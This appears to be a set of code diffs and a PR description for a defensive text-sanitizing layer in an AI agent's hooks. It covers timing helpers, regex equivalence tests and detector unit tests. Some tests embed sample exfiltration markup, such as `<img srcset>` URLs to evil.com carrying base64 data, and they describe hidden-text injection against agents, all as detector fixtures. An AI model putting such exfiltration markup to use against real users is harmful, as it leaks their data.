-/** The CPU time a block charged the process, in ms. `process.cpuUsage` counts
- * every thread, so a collector pass or a background compile the block provoked
- * is charged to it — which is the intent, since the hook pays for those too. */
-const cpuSince = (mark) => {
-  const spent = process.cpuUsage(mark);
-  return (spent.user + spent.system) / 1000;
-};
-
-/**
- * A block's cost, in both clocks. `cpu` is what every ratio below reads: a ratio
- * cancels a slower machine because both sides run at that speed, but not a busy
- * one, because the two sides are timed over blocks of very different length — a
- * 1 ms calibration pass reliably catches a quiet slot for its fastest sample and
- * a 250 ms parse5 run never does, so the divisor stays flat while the numerator
- * inflates. Time descheduled behind another test worker is not time this code
- * spent, and the CPU clock does not charge it.
- *
- * Each call gets its own document from `input(attempt)`. Handing every call the
- * same string measures a memo hit rather than the work: the HTML layer
- * remembers its last parse, so the warm-up builds the tree the timed runs then
- * reuse — 81 ms for a 256 KB fragment against the 160 ms a hook pays for a
- * document it is seeing for the first time, which is the only case there is.
- * The inputs differ in length by one code point, so the shape is unchanged.
- * @param {(attempt: number) => string} input
- * @param {(text: string) => unknown | Promise<unknown>} fn
- * @returns {Promise<Timing>}
- */
-async function measure(input, fn) {
-  await fn(input(0));
-  const best = { cpu: Infinity, wall: Infinity };
-  for (let i = 1; i <= SAMPLES; i++) {
-    const text = input(i);
-    const mark = process.cpuUsage();
-    const started = performance.now();
-    await fn(text);
-    // Each estimator takes its own minimum: the quietest sample by wall clock
-    // need not be the cheapest by CPU, and taking the pair from one sample would
-    // charge the CPU figure for whatever made that sample the quietest.
-    best.wall = Math.min(best.wall, performance.now() - started);
-    best.cpu = Math.min(best.cpu, cpuSince(mark));
-  }
-  return best;
-}
-
-/** A timed block has to last at least this long to be a measurement rather than
- * timer noise, however cheap the call it is made of. */
-const MIN_BLOCK_MS = 5;
-/** How many distinct documents a timed block cycles through. */
-const BLOCK_RING = 8;
-
-/**
- * The per-call CPU cost of `fn`, timed over as many calls as it takes to fill a
- * block of `blockMs`.
- *
- * One 32 KB pass costs a fraction of a millisecond on a fast machine, and that
- * is the number the scaling gate divides by. Timing a batch and dividing keeps
- * the small end meaningful at any machine speed.
- *
- * `blockMs` is what makes the two sides of a scaling ratio comparable: the
- * caller passes the cost of the side it will be divided into, since
- * fastest-of-N is fair only between blocks of similar length (see
- * {@link measure}). Under {@link MIN_BLOCK_MS} the floor wins and the bias runs
- * the other way — those cells sit an order of magnitude clear of
- * {@link SCALING_LIMIT}.
- * @param {(attempt: number) => string} input
- * @param {(text: string) => unknown | Promise<unknown>} fn
- * @param {number} blockMs
- * @returns {Promise<number>}
- */
-async function measurePerCall(input, fn, blockMs) {
-  const single = (await measure(input, fn)).cpu;
-  // A zero would divide into a repeat count no loop finishes. The resolution
-  // probe in `before` is what normally catches a clock too coarse to measure
-  // these calls; this refuses to hang if one gets past it.
-  assert.ok(single > 0, "the CPU clock reported no time for a timed call");
-  const repeats = Math.ceil(Math.max(MIN_BLOCK_MS, blockMs) / single);
-  if (repeats <= 1) return single;
-  // The block cycles a ring of distinct documents for the same reason `measure`
-  // varies its input, and a ring rather than one document per call because
-  // `repeats` runs to the hundreds on a fast machine and each document is
-  // SMALL bytes. Consecutive calls always differ, which is what a one-entry
-  // parse memo needs to miss.
-  const ring = [];
-  for (let i = 0; i < Math.min(repeats, BLOCK_RING); i++)
-    ring.push(input(SAMPLES + 1 + i));
-  const block = await measure(
-    () => "",
-    async () => {
-      for (let i = 0; i < repeats; i++) await fn(ring[i % ring.length]);
-    },
-  );
-  return block.cpu / repeats;
-}
 
 // Text shapes with materially different cost profiles. The clean ones answer
 // from bulk regex passes; the rest each drive a different arm of the carve
@@ -367,33 +241,6 @@ function calibrationPass(text) {
 const calibrate = async () =>
   (await measure(() => CALIBRATION_TEXT, calibrationPass)).cpu;
 
-/** How long a probe block busy-waits, and how many it runs. */
-const PROBE_MS = 0.2;
-const PROBE_BLOCKS = 40;
-
-/**
- * The finest CPU-time reading this clock resolves, in ms.
- *
- * `process.cpuUsage` reports microseconds, but a kernel that accumulates rusage
- * at tick granularity only ever reports whole ticks — 1 ms, or 4 ms — and the
- * calibration pass costs about one millisecond, so on such a kernel the unit is
- * quantized to within its own size and no ratio here means anything. Busy-wait
- * blocks well under a tick and keep the smallest non-zero reading: it comes back
- * near {@link PROBE_MS} on a microsecond clock and at a whole tick otherwise.
- */
-function clockResolutionMs() {
-  let finest = Infinity;
-  for (let i = 0; i < PROBE_BLOCKS; i++) {
-    const mark = process.cpuUsage();
-    const until = performance.now() + PROBE_MS;
-    let spin = 0;
-    while (performance.now() < until) spin += Math.sqrt(spin + 1);
-    const spent = cpuSince(mark);
-    if (spent > 0 && spent < finest) finest = spent;
-  }
-  return finest;
-}
-
 /**
  * `fn`'s CPU cost in calibration units, calibrating on BOTH sides of the
  * measurement and taking the larger unit. The test runner runs files in
@@ -437,12 +284,8 @@ const timing = {
   foldChanged: false,
 };
 
-/** The coarsest clock these gates can be read on. A reading no finer than this
- * cannot resolve the calibration pass, and `measurePerCall` would divide a
- * matched block by a zero. Checked here rather than in a test body: every
- * measurement below is downstream of it. */
-const RESOLUTION_CEILING_MS = 0.5;
-
+// The clock check runs here rather than in a test body: every measurement below
+// is downstream of it.
 before(async () => {
   if (MUTATION_RUN) return;
   const resolution = clockResolutionMs();

--- a/test/hook-latency.test.mjs
+++ b/test/hook-latency.test.mjs
@@ -18,7 +18,7 @@
  * block is charged in CPU time rather than wall clock (see `measure` in
  * {@link ./helpers/cpu-timing.mjs}). {@link REALISTIC_MS} is the lone exception.
  */
-import { describe, it, before } from "node:test";
+import { describe, before } from "node:test";
 import assert from "node:assert/strict";
 import { classifyPrompt } from "../src/prompt.mjs";
 import { sanitizeText } from "../src/output.mjs";
@@ -34,6 +34,7 @@ import {
   grow,
   measure,
   measurePerCall,
+  timed,
 } from "./helpers/cpu-timing.mjs";
 
 const { claudeAdapter } = await import("agent-control-plane-core/claude");
@@ -337,18 +338,6 @@ before(async () => {
     }
   }
 });
-
-/** An `it` whose verdict rests on the timings, and so has none under Stryker.
- * @param {string} name
- * @param {(t: import("node:test").TestContext) => void | Promise<void>} fn */
-const timed = (name, fn) =>
-  it(name, async (t) => {
-    if (MUTATION_RUN) {
-      t.skip(MUTATION_RUN);
-      return;
-    }
-    await fn(t);
-  });
 
 describe("hook-path latency", () => {
   timed("the calibration is a measurement, not timer noise", () => {

--- a/test/html-property.test.mjs
+++ b/test/html-property.test.mjs
@@ -761,22 +761,39 @@ describe("differential: the base64url character-mix gate", () => {
   });
 });
 
+/** Each rewritten token pattern beside the spelling it replaced, plus one token
+ * the pair must ACCEPT: two patterns that reject everything agree on
+ * everything, and a random draw reaches an accepted token only by luck. */
 const NUMERIC_PATTERN_PAIRS = [
   [
     "rgb() percentage channel",
     /^\+?(\d*\.?\d+)%$/,
     /^\+?(\d+(?:\.\d+)?|\.\d+)%$/,
+    "50%",
   ],
-  ["rgb() number channel", /^\+?(\d*\.?\d+)$/, /^\+?(\d+(?:\.\d+)?|\.\d+)$/],
+  [
+    "rgb() number channel",
+    /^\+?(\d*\.?\d+)$/,
+    /^\+?(\d+(?:\.\d+)?|\.\d+)$/,
+    "128",
+  ],
   [
     "hsl() hue",
     /^([+-]?\d*\.?\d+)(deg|grad|rad|turn)?$/,
     /^([+-]?(?:\d+(?:\.\d+)?|\.\d+))(deg|grad|rad|turn)?$/,
+    "-90deg",
   ],
   [
     "hsl() saturation/lightness",
     /^\+?(\d*\.?\d+)%?$/,
     /^\+?(\d+(?:\.\d+)?|\.\d+)%?$/,
+    ".5",
+  ],
+  [
+    "transparent-zero alpha",
+    /^\+?(?:0*\.?0+)%?$/,
+    /^\+?(?:0+(?:\.0+)?|\.0+)%?$/,
+    "0.0%",
   ],
 ];
 // Whole units as single choices, so the generator reaches `90deg`/`.5turn` and
@@ -812,19 +829,14 @@ const structuredTokens = TOKEN_POSITIONS.reduce(
 );
 
 describe("differential: the CSS numeric-token patterns", () => {
-  for (const [label, reference, shipped] of NUMERIC_PATTERN_PAIRS) {
+  for (const [label, reference, shipped, accepts] of NUMERIC_PATTERN_PAIRS) {
     it(`${label} accepts the same tokens with the same captures`, () => {
-      // Two patterns that reject everything also agree on everything, so the
-      // run has to land on the accepting side too.
-      let accepted = 0;
+      assert.ok(shipped.test(accepts), `${label} rejects ${accepts}`);
+      agree(reference, shipped, accepts);
       fc.assert(
-        fc.property(numericToken, (token) => {
-          if (shipped.test(token)) accepted += 1;
-          agree(reference, shipped, token);
-        }),
+        fc.property(numericToken, (token) => agree(reference, shipped, token)),
         runOptions,
       );
-      assert.ok(accepted > 0, "no generated token was ever accepted");
     });
     it(`${label} agrees on every sign/integer/dot/fraction/suffix combination`, () => {
       let accepted = 0;

--- a/test/html-property.test.mjs
+++ b/test/html-property.test.mjs
@@ -666,3 +666,201 @@ describe("property: splice fidelity", () => {
       assert.equal(result.warned.tags.script, 1);
     }));
 });
+
+// ─── 6. Differential: two spellings, one language ────────────────────────────
+//
+// Each pattern below is spelled twice: the linear-time form the layer ships and
+// a reference form written for readability. The pair is inline because every
+// one of these patterns is module-private, and a difference on ANY generated
+// input is a real defect — the whole point of the shipped spelling is that it
+// accepts exactly the same language while failing in linear time.
+
+// A pattern's verdict AND its captures, as a plain array so two patterns can be
+// compared exactly (`null` when the pattern rejects).
+const captures = (pattern, text) => {
+  const match = text.match(pattern);
+  return match === null ? null : match.slice();
+};
+
+const agree = (reference, shipped, text) => {
+  assert.equal(
+    reference.test(text),
+    shipped.test(text),
+    `verdicts differ on ${JSON.stringify(text)}`,
+  );
+  assert.deepEqual(
+    captures(reference, text),
+    captures(shipped, text),
+    `captures differ on ${JSON.stringify(text)}`,
+  );
+};
+
+const B64URL_MIXED_REFERENCE = /(?=.*[A-Z])(?=.*[0-9])/;
+const base64UrlChar = fc.constantFrom(
+  ..."ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-".split(
+    "",
+  ),
+);
+const base64UrlString = fc
+  .array(base64UrlChar, { maxLength: 60 })
+  .map((chars) => chars.join(""));
+
+describe("differential: the base64url character-mix gate", () => {
+  it("two scans agree with the lookahead pair", () =>
+    checkProperty(base64UrlString, (value) =>
+      assert.equal(
+        B64URL_MIXED_REFERENCE.test(value),
+        /[A-Z]/.test(value) && /[0-9]/.test(value),
+      ),
+    ));
+
+  // The gate through the public surface. Three-character groups joined by `-`
+  // hold every OTHER exfil rule off this value: the `-` keeps it out of the
+  // standard-base64 and hex arms, and no group reaches the 20-character
+  // contiguous run the credential-shape rule needs — so the character mix is
+  // the only thing that can move the verdict. One alphabet per value, so
+  // single-class values (which the gate must leave alone) are generated as
+  // often as mixed ones rather than drowned out by them.
+  const groupedValue = fc
+    .constantFrom(
+      "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
+      "0123456789",
+      "abcdefghijklmnopqrstuvwxyz",
+      "ABCdef123_",
+    )
+    .chain((alphabet) =>
+      fc
+        .array(fc.constantFrom(...alphabet.split("")), {
+          minLength: 42,
+          maxLength: 90,
+        })
+        .map((chars) =>
+          chars
+            .join("")
+            .match(/.{1,3}/g)
+            .join("-"),
+        ),
+    );
+  it("decides checkExfilUrl's verdict on a hyphen-grouped query value", () => {
+    let flagged = 0;
+    let benign = 0;
+    fc.assert(
+      fc.property(groupedValue, (value) => {
+        assert.ok(value.length >= 40 && value.length < 190);
+        const mixed = B64URL_MIXED_REFERENCE.test(value);
+        if (mixed) flagged += 1;
+        else benign += 1;
+        assert.equal(
+          checkExfilUrl(`https://e.com/p?d=${value}`),
+          mixed ? "suspicious query parameter" : null,
+        );
+      }),
+      runOptions,
+    );
+    assert.ok(flagged > 0 && benign > 0, "one branch never generated");
+  });
+});
+
+const NUMERIC_PATTERN_PAIRS = [
+  [
+    "rgb() percentage channel",
+    /^\+?(\d*\.?\d+)%$/,
+    /^\+?(\d+(?:\.\d+)?|\.\d+)%$/,
+  ],
+  ["rgb() number channel", /^\+?(\d*\.?\d+)$/, /^\+?(\d+(?:\.\d+)?|\.\d+)$/],
+  [
+    "hsl() hue",
+    /^([+-]?\d*\.?\d+)(deg|grad|rad|turn)?$/,
+    /^([+-]?(?:\d+(?:\.\d+)?|\.\d+))(deg|grad|rad|turn)?$/,
+  ],
+  [
+    "hsl() saturation/lightness",
+    /^\+?(\d*\.?\d+)%?$/,
+    /^\+?(\d+(?:\.\d+)?|\.\d+)%?$/,
+  ],
+];
+// Whole units as single choices, so the generator reaches `90deg`/`.5turn` and
+// not only their one-character prefixes.
+const numericPiece = fc.constantFrom(
+  ..."0123456789.+-%e ".split(""),
+  "deg",
+  "grad",
+  "rad",
+  "turn",
+  "DEG",
+);
+const numericToken = fc
+  .array(numericPiece, { maxLength: 12 })
+  .map((pieces) => pieces.join(""));
+
+// The token positions the two spellings can possibly disagree on: a sign, an
+// integer part, a dot, a fraction part, a suffix. Random draws over these
+// alone leave gaps — a leading-dot fraction with a `%` is one draw in
+// thousands, and it is exactly the shape the disjoint arms exist for — so the
+// cross product is enumerated in full rather than sampled.
+const TOKEN_POSITIONS = [
+  ["", "+", "-", "++", "+-"],
+  ["", "0", "5", "12", "007"],
+  ["", ".", ".."],
+  ["", "0", "5", "25"],
+  ["", "%", "deg", "grad", "rad", "turn", "DEG", "e5", "px", " ", "%%"],
+];
+const structuredTokens = TOKEN_POSITIONS.reduce(
+  (tokens, position) =>
+    tokens.flatMap((token) => position.map((part) => token + part)),
+  [""],
+);
+
+describe("differential: the CSS numeric-token patterns", () => {
+  for (const [label, reference, shipped] of NUMERIC_PATTERN_PAIRS) {
+    it(`${label} accepts the same tokens with the same captures`, () => {
+      // Two patterns that reject everything also agree on everything, so the
+      // run has to land on the accepting side too.
+      let accepted = 0;
+      fc.assert(
+        fc.property(numericToken, (token) => {
+          if (shipped.test(token)) accepted += 1;
+          agree(reference, shipped, token);
+        }),
+        runOptions,
+      );
+      assert.ok(accepted > 0, "no generated token was ever accepted");
+    });
+    it(`${label} agrees on every sign/integer/dot/fraction/suffix combination`, () => {
+      let accepted = 0;
+      for (const token of structuredTokens) {
+        if (shipped.test(token)) accepted += 1;
+        agree(reference, shipped, token);
+      }
+      assert.ok(accepted > 0, "no enumerated token was ever accepted");
+    });
+  }
+});
+
+const UNTERMINATED_MARKUP_TAIL_REFERENCE = /<(?:[!?]|\/?[a-zA-Z])[^>]*$/;
+const MARKUP_OPENER = /<(?:[!?]|\/?[a-zA-Z])/;
+const markupChar = fc.constantFrom("<", ">", "/", "!", "?", "a", "B", " ");
+const markupSoup = fc
+  .array(markupChar, { maxLength: 24 })
+  .map((chars) => chars.join(""));
+
+describe("differential: the unterminated-markup tail test", () => {
+  it("the slice after the last `>` agrees with the anchored tail pattern", () => {
+    let open = 0;
+    let closed = 0;
+    fc.assert(
+      fc.property(markupSoup, (raw) => {
+        const unterminated = UNTERMINATED_MARKUP_TAIL_REFERENCE.test(raw);
+        if (unterminated) open += 1;
+        else closed += 1;
+        assert.equal(
+          unterminated,
+          MARKUP_OPENER.test(raw.slice(raw.lastIndexOf(">") + 1)),
+          `verdicts differ on ${JSON.stringify(raw)}`,
+        );
+      }),
+      runOptions,
+    );
+    assert.ok(open > 0 && closed > 0, "one branch never generated");
+  });
+});

--- a/test/html.test.mjs
+++ b/test/html.test.mjs
@@ -2077,6 +2077,30 @@ describe("unit: detectExfil HTML-attr + node types", () => {
     );
     assert.equal(threat.target, "evil.com");
   });
+  it("strips a whole RUN of trailing commas off a srcset candidate", () => {
+    // The first candidate's URL run ends in `,,,`: the whole comma tail comes
+    // off (a URL keeping it would not parse to `evil.com`) and the run counts
+    // as bare, so the second candidate after it is parsed too.
+    assert.deepEqual(
+      detectExfil(
+        `<img srcset="https://evil.com/a.png?data=${b64},,, https://bad.example/b.png?data=${b64} 2x">`,
+      ),
+      [
+        {
+          isImage: true,
+          autoFetched: true,
+          reason: "suspicious query parameter",
+          target: "evil.com",
+        },
+        {
+          isImage: true,
+          autoFetched: true,
+          reason: "suspicious query parameter",
+          target: "bad.example",
+        },
+      ],
+    );
+  });
   it("keeps a srcset URL that itself contains commas intact (no split shredding)", () => {
     const threat = onlyThreat(
       `<img srcset="https://evil.com/b.png?a=1,2&data=${b64} 2x">`,

--- a/test/html.test.mjs
+++ b/test/html.test.mjs
@@ -542,6 +542,67 @@ describe("unit: isHiddenStyle exact verdicts", () => {
       assert.equal(isHiddenStyle(`background:${proto}`), false));
 });
 
+// One row per numeric token, with the verdict it earns in each of the three
+// channel positions: an rgb() channel, an hsl() hue, an hsl() saturation.
+// `true` means the token RESOLVED (both sides canonicalize to the same concrete
+// color, so the text is hidden); `false` means the parser rejected it and the
+// declaration failed open.
+const COLOR_TOKEN_CASES = [
+  ["0", true, true, true],
+  ["255", true, true, true],
+  ["128.5", true, true, true],
+  [".5", true, true, true],
+  ["+5", true, true, true],
+  // A hue is an <angle> or a <number>; `%` is neither.
+  ["+5%", true, false, true],
+  ["50%", true, false, true],
+  ["100%", true, false, true],
+  ["0%", true, false, true],
+  // A fraction needs a digit on both sides of the dot.
+  ["1.", false, false, false],
+  [".", false, false, false],
+  // css-tree re-serializes this as the two numbers `1.2 .3`, so no channel
+  // parser ever receives it whole: rgb() then counts six channels and fails
+  // open, while hsl() reads four components and takes the last as an alpha.
+  ["1.2.3", false, true, true],
+  ["", false, false, false],
+  ["abc", false, false, false],
+  // Angle units belong to the hue alone; a signed value is a hue-only shape too.
+  ["90deg", false, true, false],
+  ["0.5turn", false, true, false],
+  [".5rad", false, true, false],
+  ["-45", false, true, false],
+  ["+45grad", false, true, false],
+  // The declaration value is lowercased before parsing, so the unit's case
+  // never reaches the angle grammar.
+  ["90DEG", false, true, false],
+];
+
+describe("unit: rgb()/hsl() numeric channel tokens", () => {
+  // The same token paints both the text and its background, so a token the
+  // parser resolves is a same-color hide and one it rejects fails open — the
+  // verdict reads out the token grammar. The comma form is load-bearing:
+  // css-tree re-serializes the space-separated form without its separating
+  // whitespace (`rgb(50% 0 0)` becomes `rgb(50%0 0)`), fusing two channels into
+  // one before the parser sees them.
+  const sameColor = (fn) => `color:${fn};background-color:${fn}`;
+  for (const [token, rgb, hue, saturation] of COLOR_TOKEN_CASES) {
+    const shown = JSON.stringify(token);
+    it(`rgb() channel ${shown}`, () =>
+      assert.equal(
+        isHiddenStyle(sameColor(`rgb(${token},${token},${token})`)),
+        rgb,
+      ));
+    it(`hsl() hue ${shown}`, () =>
+      assert.equal(isHiddenStyle(sameColor(`hsl(${token},100%,50%)`)), hue));
+    it(`hsl() saturation ${shown}`, () =>
+      assert.equal(
+        isHiddenStyle(sameColor(`hsl(90,${token},50%)`)),
+        saturation,
+      ));
+  }
+});
+
 // ─── invariant: one rendered color, one verdict ──────────────────────────────
 //
 // A browser renders every spelling of a color identically, so isHiddenStyle
@@ -912,6 +973,38 @@ describe("unit: checkExfilUrl exact verdicts", () => {
     assert.ok(slug.length < 200);
     assert.equal(checkExfilUrl("https://e.com/p?d=" + slug), null);
   });
+  // The character-mix gate at ONE length: every value below is exactly 40
+  // characters over `[A-Za-z0-9-]`, so the length floor and the 200-char query
+  // rule are held constant and only the mix moves the verdict. The `-` keeps
+  // the standard-base64 arm out of it — that arm carries no mix requirement and
+  // would claim the uppercase-only value by itself.
+  for (const [label, value, expected] of [
+    ["uppercase and digits", "Ab3-".repeat(10), "suspicious query parameter"],
+    ["uppercase only", "ABC-".repeat(10), null],
+    ["digits only", "012-".repeat(10), null],
+    ["lowercase word-slug", "abc-".repeat(10), null],
+  ])
+    it(`${expected ? "flags" : "leaves"} a 40-char base64url value of ${label}`, () => {
+      assert.equal(value.length, 40);
+      assert.equal(checkExfilUrl("https://e.com/p?d=" + value), expected);
+    });
+  it("applies the mix gate only past the 40-char floor", () =>
+    assert.equal(
+      checkExfilUrl("https://e.com/p?d=" + "Ab3-".repeat(9) + "Ab3"),
+      null,
+    ));
+  // Rejoining `.`-chunks demands the same mix, which is what separates a
+  // chunked payload from a batch REST path of tickers or numeric ids.
+  for (const [label, chunk, expected] of [
+    ["mixed case and digits", "Ab3xYz9Q", "encoded data blob in path segment"],
+    ["uppercase tickers", "ABCDEFGH", null],
+    ["numeric ids", "01234567", null],
+  ])
+    it(`${expected ? "flags" : "leaves"} a dot-chunked path segment of ${label}`, () => {
+      const segment = Array(20).fill(chunk).join(".");
+      assert.equal(segment.replace(/\./g, "").length, 160);
+      assert.equal(checkExfilUrl("https://e.com/" + segment), expected);
+    });
   it("flags a query exactly past the length threshold (201), not at it (200)", () => {
     assert.equal(
       checkExfilUrl("https://e.com/p?n=" + "-".repeat(198)),
@@ -2165,6 +2258,29 @@ describe("splice fidelity and regressions", () => {
       assert.equal(applyHtml(input), input, input);
     }
   });
+  // Whether a prose run leaves a construct open decides the fate of the hidden
+  // span behind it: an open construct absorbs it as tag soup (fail open, source
+  // untouched), a closed or non-markup run leaves it a real element to splice.
+  // Only the tail after the run's last `>` can leave anything open.
+  for (const [absorbs, prefix, why] of [
+    [false, "a < b", "a bare `<` in prose is not markup"],
+    [false, "i <3 u", "an emoticon is not markup"],
+    [true, "<a", "an unterminated open tag"],
+    [true, "</A", "an unterminated end tag"],
+    [true, "<!", "a bogus comment opener"],
+    [true, "<?", "a processing-instruction-ish opener"],
+    [false, "<a>b", "a terminated tag with prose behind it"],
+    [true, "<a>b <span", "a terminated tag then a reopened one"],
+    [false, "<b>x</b> y > z", "several `>`, and the last tail is clean"],
+  ])
+    it(`${absorbs ? "absorbs" : "splices"} the hidden span behind ${why}`, () => {
+      const hidden = '<span style="display:none">gone</span>';
+      const input = `t ${prefix} ${hidden}`;
+      assert.equal(
+        applyHtml(input),
+        absorbs ? input : `t ${prefix} ${hid(hidden)}`,
+      );
+    });
   for (const [tag, body] of [
     ["style", "<!A"],
     ["script", "<!--a-->"],

--- a/test/mutation-shards.test.mjs
+++ b/test/mutation-shards.test.mjs
@@ -52,7 +52,8 @@ const shards = expandShards(repoRoot);
  * straight off disk, so `mutatedSources` resolves for real — the derivation
  * under test is the live one, not a stand-in.
  *
- * @param {{split?: {id: string, file: string}[], groupCount?: number,
+ * @param {{split?: {id: string, file: string, splitEvery?: unknown}[],
+ *   groupCount?: number, splitEvery?: number,
  *   src?: Record<string, number>, tooling?: Record<string, number>,
  *   packs?: string[]}} spec file names mapped to their line counts
  * @returns {string} the scratch repo root
@@ -60,6 +61,7 @@ const shards = expandShards(repoRoot);
 function scratchRepo({
   split = [],
   groupCount = 2,
+  splitEvery = 300,
   src = {},
   tooling = {},
   packs = ["src/*.mjs"],
@@ -77,7 +79,7 @@ function scratchRepo({
   writeFileSync(join(root, "package.json"), JSON.stringify({ files: packs }));
   writeFileSync(
     join(root, ".github", "mutation-shards.json"),
-    JSON.stringify({ splitEvery: 300, split, groupCount }),
+    JSON.stringify({ splitEvery, split, groupCount }),
   );
   return root;
 }
@@ -260,16 +262,80 @@ describe("mutation shard matrix", () => {
     }
   });
 
-  it("caps every split slice at splitEvery lines (last slice excepted, it ends open)", () => {
-    const { splitEvery } = config;
+  it("caps every split slice at its entry's splitEvery (last slice excepted, it ends open)", () => {
+    const widthOf = new Map(
+      config.split.map((entry) => [
+        entry.file,
+        entry.splitEvery ?? config.splitEvery,
+      ]),
+    );
+    let checked = 0;
     for (const shard of shards) {
       for (const entry of parseMutate(shard.mutate)) {
         if (entry.start === undefined || entry.end >= EOF_SENTINEL) continue;
+        const width = widthOf.get(entry.file);
         assert.equal(
           entry.end - entry.start + 1,
-          splitEvery,
-          `${shard.id}: interior slice must be exactly ${splitEvery} lines`,
+          width,
+          `${shard.id}: interior slice must be exactly ${width} lines`,
         );
+        checked++;
+      }
+    }
+    // Every split file could be short enough to be one open-ended slice, in
+    // which case the loop above asserts nothing at all.
+    assert.ok(checked > 0, "no interior slice was measured");
+  });
+
+  it("narrows only the entry that overrides splitEvery", () => {
+    const root = scratchRepo({
+      splitEvery: 300,
+      src: { "wide.mjs": 600, "narrow.mjs": 600, "grouped.mjs": 5 },
+      split: [
+        { id: "wide", file: "src/wide.mjs" },
+        { id: "narrow", file: "src/narrow.mjs", splitEvery: 200 },
+      ],
+      groupCount: 1,
+    });
+    try {
+      const ranges = Object.fromEntries(
+        expandShards(root).map((s) => [s.id, s.mutate]),
+      );
+      // Both files are 600 written lines, so `split("\n")` counts 601 and each
+      // gets one extra slice past the last full-width boundary.
+      assert.deepEqual(
+        Object.entries(ranges).filter(([id]) => !id.startsWith("group-")),
+        [
+          ["wide-1", "src/wide.mjs:1-300"],
+          ["wide-2", "src/wide.mjs:301-600"],
+          ["wide-3", `src/wide.mjs:601-${EOF_SENTINEL}`],
+          ["narrow-1", "src/narrow.mjs:1-200"],
+          ["narrow-2", "src/narrow.mjs:201-400"],
+          ["narrow-3", "src/narrow.mjs:401-600"],
+          ["narrow-4", `src/narrow.mjs:601-${EOF_SENTINEL}`],
+        ],
+      );
+    } finally {
+      rmSync(root, { recursive: true, force: true });
+    }
+  });
+
+  it("refuses a per-entry splitEvery that is not a positive integer", () => {
+    // `null` is absent from this list on purpose: `??` treats it as "not set"
+    // and falls back to the global width, which is a valid expansion.
+    for (const splitEvery of [0, -1, 2.5, "7"]) {
+      const root = scratchRepo({
+        src: { "a.mjs": 5, "b.mjs": 5, "c.mjs": 5 },
+        split: [{ id: "bad", file: "src/a.mjs", splitEvery }],
+      });
+      try {
+        assert.throws(
+          () => expandShards(root),
+          /split entry bad has splitEvery .*, which is not a positive integer/,
+          `per-entry splitEvery ${JSON.stringify(splitEvery)} must be refused`,
+        );
+      } finally {
+        rmSync(root, { recursive: true, force: true });
       }
     }
   });


### PR DESCRIPTION
## What &amp; why

Makes six quadratic paths in the detection layers linear, adds the gate that catches the class they belong to, and writes the guarantee down. Claims `src/html.mjs`, `src/confusables.mjs`, `test/algorithmic-complexity.test.mjs` + `test/helpers/cpu-timing.mjs` (new), `THREAT-MODEL.md`, `eslint.config.mjs`.

Every layer reads attacker-controlled text inside a hook the user waits on, so a cost blow-up denies service against the agent as completely as a missed payload. The regex half was already defended — regexploit over an AST-extracted inventory of every shipped pattern, plus a latency ratchet and wall-clock deadlines — but it proves only that no pattern backtracks super-linearly *within one match attempt*. Two shapes of quadratic carry no backtracking at all, so no pattern analyzer will ever report them, and both had shipped: an **unanchored** pattern retried at every start offset (linear per attempt, quadratic overall), and work that is not a pattern — a string rebuilt once per finding.

One correctness fix rides along, found while reworking the same function: `selectFoldableFindings` marked foldable offsets in UTF-16 units but walked each finding's `char` by **code point**, so a `char` carrying an astral glyph left its trailing offsets unchecked. An adversarial finding spanning from a foldable token into one the gate refused was kept, and the fold then rewrote that token — the mangling the gate exists to prevent.

## Partitions

| commit | concern |
|---|---|
| `perf(html)` | five regex rewrites, all language-preserving |
| `perf(confusables)` | the fold&#39;s overlap branch; `assertFinding` takes bytes rather than the whole text |
| `test` | the new growth gate; timing harness extracted so both cost gates share one estimator |
| `docs(threat-model)` | policy section — **not a layer**, count and numbering unchanged |
| `build(lint)` | `eslint-plugin-redos`, scoped to shipped code |
| `test` (review round) | corrects the markup-tail case's input, lowers the limit, closes two test gaps |
| `docs(threat-model)` (review round) | bounds the guarantee at `n log n`, where the two sorts put it |
| `fix(confusables)` | the astral gate-escape above |

What was fixed, and what it measured at 8x input before and after:

| defect | before | after |
|---|---|---|
| base64url mix test `(?=.*[A-Z])(?=.*[0-9])` — unanchored double lookahead | **64.0x** | 10.8x |
| channel tokens `\d*\.?\d+` (×4) and transparent-alpha `0*\.?0+` — overlapping arms | **61.1x** | 7.7x |
| `foldConfusables` rebuilding the whole tail per overlapping finding | **27.1x** | 8.4x |
| unterminated-markup `[^&gt;]*$` rescanned from every `&lt;` | 10.2x | 10.0x |
| srcset `,+$` trailing-comma trim — unanchored start | found by recheck | — |

## Review focus

**Read `src/confusables.mjs` first** — it holds both the only real invariant and the only behavior change. `foldConfusables` assembles the output back-to-front in `tail`, so `takeFromTail` must consume the tail&#39;s *lowest-offset* bytes, which are the entries pushed *most recently*. Getting that direction backwards produces a plausible wrong string rather than an error, and it is not visible on one screen: the ordering contract lives in `foldConfusables`&#39;s loop, the consumption in `takeFromTail`, and the validation in `assertFinding` — whose signature changed from `(text, finding)` to `(finding, actual)` precisely so the overlap branch can validate against ~2 bytes instead of re-joining the whole tail. Check that the check *order* survived that move: the index-range, empty-char, ASCII and latinEquivalent guards must still fire in the same sequence, since several tests assert on which message comes back.

The part I am least sure of is `GROWTH_LIMIT = 20` in the new gate. It is a timing threshold read on shared CI runners; if it proves flaky the honest fix is a wider limit, not a quieter test. It sits between two measured populations (7.7–10.0x on the shipped code, 27.1–64.0x on the defects), and the deliberately quadratic control reads 60–74x — but the margin above `sanitizeHtml`&#39;s 10.0x is only 2x, and that case is the one whose cost is dominated by the document parse rather than by the scan it targets.

## How it was tested

- **The gate goes red on the pre-fix code** — run explicitly, not assumed. Against the unfixed tree `checkExfilUrl/lowercase-blob-path` read 64.0x, `isHiddenStyle/digit-channel` 61.1x, `foldConfusables/overlapping-findings` 27.1x. Every measured figure is recorded in the gate&#39;s file header.
- **The gate-escape fix has a red-then-green regression case.** Against the code-point walk, a finding of `𝐀𝐁 о` at offset 1 survives `selectFoldableFindings` even though offsets 5–6 belong to a token the gate rejected; against the fix it is dropped and the two legitimate findings are kept.
- **Equivalence is differential, not eyeballed.** `test/html-property.test.mjs` holds each old pattern beside its replacement and compares the verdict *and* the captures, over fast-check draws plus a full 3300-token enumeration of sign × integer × dot × fraction × suffix. The enumeration earns its place: a deliberately broken replacement (dropped `|\.\d+` arm) passes the fuzzed generator and fails only on `&#34;.0%&#34;`. The fold is compared against a naive high-to-low splice reference over generated overlapping finding sets; deleting `takeFromTail`&#39;s push-back diverges in 51/500 cases.
